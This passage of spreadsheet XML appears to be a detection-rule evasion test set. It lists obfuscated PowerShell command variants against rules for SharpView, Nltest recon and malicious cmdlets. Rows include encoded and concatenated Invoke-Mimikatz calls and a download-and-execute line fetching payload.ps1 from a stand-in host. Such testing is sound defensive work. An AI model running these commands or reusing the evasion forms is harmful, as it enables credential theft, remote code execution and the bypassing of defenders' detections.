    <row r="424" ht="15.75" customHeight="1" s="42">
      <c r="A424" s="43" t="n"/>
      <c r="B424" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C424" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D424" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E424" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -ExeCUTIONPOLICY Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F424" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G424" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H424" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I424" s="36" t="n"/>
      <c r="J424" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K424" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="425" ht="15.75" customHeight="1" s="42">
      <c r="A425" s="43" t="n"/>
      <c r="B425" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C425" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D425" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E425" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -EXeCutIONPOlIcY Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F425" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G425" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H425" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I425" s="43" t="n"/>
      <c r="J425" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K425" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="426" ht="15.75" customHeight="1" s="42">
      <c r="A426" s="43" t="n"/>
      <c r="B426" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C426" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D426" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E426" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noPrOFilE -"ExecutionPolicy" Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F426" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G426" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H426" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I426" s="36" t="n"/>
      <c r="J426" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K426" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="427" ht="15.75" customHeight="1" s="42">
      <c r="A427" s="43" t="n"/>
      <c r="B427" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C427" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D427" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E427" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"ExecutionPolicy" Bypass -COmMaNd "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F427" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G427" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H427" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I427" s="36" t="n"/>
      <c r="J427" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K427" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="428" ht="15.75" customHeight="1" s="42">
      <c r="A428" s="43" t="n"/>
      <c r="B428" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C428" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D428" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E428" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -eXecUTIoNpolicY Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F428" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G428" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H428" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I428" s="43" t="n"/>
      <c r="J428" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K428" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="429" ht="15.75" customHeight="1" s="42">
      <c r="A429" s="43" t="n"/>
      <c r="B429" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C429" s="36" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D429" s="36" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E429" s="36" t="inlineStr">
        <is>
          <t>wmic /namespace:\root\microsoftactivedirectory class Microsoft_DomainTrustStatus get /format:list</t>
        </is>
      </c>
      <c r="F429" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G429" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H429" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I429" s="36" t="n"/>
      <c r="J429" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K429" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="430" ht="15.75" customHeight="1" s="42">
      <c r="A430" s="43" t="n"/>
      <c r="B430" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C430" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D430" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E430" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F430" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G430" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H430" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I430" s="36" t="n"/>
      <c r="J430" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K430" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="431" ht="15.75" customHeight="1" s="42">
      <c r="A431" s="43" t="n"/>
      <c r="B431" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C431" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D431" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E431" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F431" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G431" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H431" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I431" s="43" t="n"/>
      <c r="J431" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K431" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="432" ht="15.75" customHeight="1" s="42">
      <c r="A432" s="43" t="n"/>
      <c r="B432" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C432" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D432" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E432" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F432" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G432" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H432" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I432" s="36" t="n"/>
      <c r="J432" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K432" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="433" ht="15.75" customHeight="1" s="42">
      <c r="A433" s="43" t="n"/>
      <c r="B433" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C433" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D433" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E433" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F433" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G433" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H433" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I433" s="36" t="n"/>
      <c r="J433" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K433" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="434" ht="15.75" customHeight="1" s="42">
      <c r="A434" s="43" t="n"/>
      <c r="B434" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C434" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D434" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E434" s="36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434" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G434" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H434" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I434" s="36" t="n"/>
      <c r="J434" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K434" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="435" ht="15.75" customHeight="1" s="42">
      <c r="A435" s="43" t="n"/>
      <c r="B435" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C435" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D435" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E435" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nOprOfIle /"NonInteractive" -ep Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F435" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G435" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H435" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I435" s="36" t="n"/>
      <c r="J435" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K435" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="436" ht="15.75" customHeight="1" s="42">
      <c r="A436" s="43" t="n"/>
      <c r="B436" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C436" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D436" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E436" s="36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436" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G436" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H436" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I436" s="36" t="n"/>
      <c r="J436" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K436" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="437" ht="15.75" customHeight="1" s="42">
      <c r="A437" s="43" t="n"/>
      <c r="B437" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C437" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D437" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E437" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noproFiLE /"NonInteractive" -ep Bypass -CoMmaND "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F437" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G437" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H437" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I437" s="36" t="n"/>
      <c r="J437" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K437" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="438" ht="15.75" customHeight="1" s="42">
      <c r="A438" s="43" t="n"/>
      <c r="B438" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C438" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D438" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E438" s="36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438" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G438" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H438" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I438" s="36" t="n"/>
      <c r="J438" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K438" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="439" ht="15.75" customHeight="1" s="42">
      <c r="A439" s="43" t="n"/>
      <c r="B439" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C439" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D439" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E439" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F439" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G439" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H439" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I439" s="36" t="n"/>
      <c r="J439" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K439" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="440" ht="15.75" customHeight="1" s="42">
      <c r="A440" s="43" t="n"/>
      <c r="B440" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C440" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D440" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E440" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F440" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G440" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H440" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I440" s="36" t="n"/>
      <c r="J440" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K440" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="441" ht="15.75" customHeight="1" s="42">
      <c r="A441" s="43" t="n"/>
      <c r="B441" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C441" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D441" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E441" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F441" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G441" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H441" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I441" s="36" t="n"/>
      <c r="J441" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K441" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="442" ht="15.75" customHeight="1" s="42">
      <c r="A442" s="43" t="n"/>
      <c r="B442" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C442" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D442" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E442" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F442" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G442" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H442" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I442" s="36" t="n"/>
      <c r="J442" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K442" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="443" ht="15.75" customHeight="1" s="42">
      <c r="A443" s="43" t="n"/>
      <c r="B443" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C443" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D443" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E443" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F443" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G443" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H443" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I443" s="36" t="n"/>
      <c r="J443" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K443" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="444" ht="15.75" customHeight="1" s="42">
      <c r="A444" s="43" t="n"/>
      <c r="B444" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C444" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D444" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E444" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F444" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G444" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H444" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I444" s="43" t="n"/>
      <c r="J444" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K444" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="445" ht="15.75" customHeight="1" s="42">
      <c r="A445" s="43" t="n"/>
      <c r="B445" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C445" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D445" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E445" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F445" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G445" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H445" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I445" s="43" t="n"/>
      <c r="J445" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K445" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="446" ht="15.75" customHeight="1" s="42">
      <c r="A446" s="43" t="n"/>
      <c r="B446" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C446" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D446" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E446" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F446" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G446" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H446" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I446" s="36" t="n"/>
      <c r="J446" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K446" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="447" ht="15.75" customHeight="1" s="42">
      <c r="A447" s="43" t="n"/>
      <c r="B447" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C447" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D447" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E447" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F447" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G447" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H447" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I447" s="43" t="n"/>
      <c r="J447" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K447" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="448" ht="15.75" customHeight="1" s="42">
      <c r="A448" s="43" t="n"/>
      <c r="B448" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C448" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D448" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E448" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F448" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G448" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H448" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I448" s="36" t="n"/>
      <c r="J448" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K448" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="449" ht="15.75" customHeight="1" s="42">
      <c r="A449" s="36" t="n"/>
      <c r="B449" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C449" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D449" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E449" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmAND SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F449" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G449" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H449" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I449" s="43" t="n"/>
      <c r="J449" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K449" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="450" ht="15.75" customHeight="1" s="42">
      <c r="A450" s="36" t="n"/>
      <c r="B450" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C450" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D450" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E450" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F450" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G450" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H450" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I450" s="43" t="n"/>
      <c r="J450" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K450" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="451" ht="15.75" customHeight="1" s="42">
      <c r="A451" s="43" t="n"/>
      <c r="B451" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C451" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D451" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E451" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F451" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G451" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H451" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I451" s="36" t="n"/>
      <c r="J451" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K451" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="452" ht="15.75" customHeight="1" s="42">
      <c r="A452" s="43" t="n"/>
      <c r="B452" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C452" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D452" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E452" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F452" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G452" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H452" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I452" s="43" t="n"/>
      <c r="J452" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K452" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="453" ht="15.75" customHeight="1" s="42">
      <c r="A453" s="43" t="n"/>
      <c r="B453" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
